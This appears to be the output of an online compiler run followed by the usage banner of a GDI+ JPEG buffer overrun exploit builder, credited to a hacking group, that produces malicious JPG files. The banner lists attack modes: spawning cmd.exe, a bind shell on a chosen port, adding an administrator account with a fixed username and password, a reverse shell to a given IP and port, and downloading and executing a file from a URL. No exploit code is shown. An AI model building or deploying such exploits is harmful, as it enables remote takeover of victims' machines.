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Compilation time: 1,97 sec, absolute running time: 0,24 sec, absolute service time: 2,22 sec 
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Process exit code is not 0: 1

                 .:[Sacred Desciples of Doom]:.                      
  GDI+ buffer overrun Exploit, Modified by Crypto <>  
               Greets to FoToZ who found the bug                     
           These Exploit will build malicious JPG File               


	a.exe 1: For lounching a local cmd.exe (not bound to the net)
	a.exe 2 [port]: For lounching cmd.exe on defined [port]
	a.exe 3: For creating a new user account
	with the username="ASP32.NET"
	and password="ASP"and add it to the local group "Administrators"
	a.exe 4 [ip] [port]: For making a conection to a defined [ip]
	and on defined [port] and bind cmd.exe on it
	a.exe 5 [http]: For downloading and then executing a file